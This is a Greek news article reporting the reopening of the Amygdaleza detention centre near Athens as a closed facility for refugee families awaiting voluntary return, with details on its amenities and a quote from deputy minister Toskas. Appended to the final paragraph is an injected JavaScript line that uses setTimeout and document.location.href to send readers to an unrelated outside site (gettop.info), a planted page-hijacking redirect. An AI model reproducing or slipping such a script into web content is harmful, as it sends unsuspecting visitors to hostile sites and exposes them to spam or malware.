Άνοιξε και πάλι η Αμυγδαλέζα, αλλά αυτή τη φορά με παιδική χαρά και wifi (ΕΙΚΟΝΕΣ-ΒΙΝΤΕΟ)

0
11

 

Άνοιξε και πάλι το κέντρο κράτησης της Αμυγδαλέζας, εν μέσω έντονων αντιδράσεων τόσο σε πολιτικό επίπεδο όσο και από τους κατοίκους της περιοχής.

Όπως έγινε γνωστό από το υπουργείο Προστασίας του Πολίτη, ο χώρος όπου θα φιλοξενούνται στο εξής οι οικογένειες προσφύγων που επιθυμούν να επιστρέψουν οικειοθελώς στις χώρες καταγωγής τους παραδόθηκε προς χρήση, στο πρώην κέντρο κράτησης μεταναστών στην Αμυγδαλέζα Αττικής.

Από τους πρώτους που έσπευσαν στην περιοχή αναπληρωτής υπουργός Προστασίας του Πολίτη Νίκος Τόσκας, ο γ.γ του υπουργείου Εσωτερικών Τζανέτος Φιλιππάκος και ο επικεφαλής του ελληνικού γραφείου του Διεθνούς Οργανισμούς Μετανάστευσης Δανιήλ Εσδράς.

toskas-amygdaleza

Όταν ο κ.Τόσκας ρωτήθηκε από δημοσιογράφους γιατί όταν είχε πρωτανοίξει το 2012 η Αμυγδαλέζα υπήρχε καταδίκη από τον ΣΥΡΙΖΑ απάντησε: «Δεν υπάρχουν καταραμένοι τόποι, υπάρχουν καταραμένες συνθήκες».

Σύμφωνα με το ενημερωτικό του υπουργείου, από τη Διεύθυνση Αλλοδαπών Αττικής πραγματοποιήθηκαν όλες οι απαραίτητες ενέργειες για τη διαμόρφωση των χώρων που μεταξύ άλλων περιλαμβάνουν παιδιατρείο, παιδότοπο, υπαίθριο χώρο με δέντρα, σκέπαστρο και παγκάκια, αίθουσα ψυχαγωγίας, ειδικό χώρο προσευχής και ασύρματη σύνδεση στο διαδίκτυο ( wi – fi ).

1amygdaleza

Άλλοι χώροι έχουν διαμορφωθεί για την κάλυψη των καθημερινών αναγκών των φιλοξενούμενων οικογενειών, όπως αποθήκη τροφίμων-αναλώσιμων και ενδυμάτων για μητέρες, παιδιά και βρέφη, χώροι πλυντηρίων/στεγνωτηρίων κ.α.

paidikixara

Ο συγκεκριμένος χώρος θα λειτουργεί ως κλειστή δομή και κέντρο κράτησης, καθώς έτσι προβλέπεται από τους κανονισμούς για τη συγκεκριμένη διαδικασία, αλλά η παραμονή των προσφύγων δεν θα ξεπερνά τις 10 μέρες. Οι εγκαταστάσεις δυναμικότητας 158 ατόμων ανακαινίστηκαν πρόσφατα με τη χορηγία του ΔΟΜ. Θα φιλοξενούνται οικογένειες προσφύγων/μεταναστών που προέρχονται από τα νησιά του Αιγαίου και επιθυμούν να επιστρέψουν οικειοθελώς στις χώρες καταγωγής τους. Στο τελικό στάδιο διαμόρφωσης βρίσκεται και δεύτερος χώρος φιλοξενίας στην Αμυγδαλέζα δυναμικότητας 152 ατόμων και ο οποίος θα παραδοθεί το επόμενο διάστημα προς χρήση.

wifi

Ειδικότερα, όσοι από τους πρόσφυγες με οικογένειες και μικρά παιδιά επιθυμούν να επιστρέψουν στις χώρες καταγωγής τους, θα πρέπει να κάνουν άρση των αιτημάτων ασύλου που έχουν υποβάλει στα νησιά (γι’ αυτό και περνούν σε κατάσταση κράτησης).

Στη συνέχεια, θα μεταφέρονται στην Αμυγδαλέζα, όπου θα φιλοξενούνται μέχρι να εκδοθούν τα διαβατήριά τους από τις πρεσβείες. Ακολούθως, συνοδευόμενοι θα αναχωρούν αεροπορικώς για τις χώρες καταγωγής τους. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here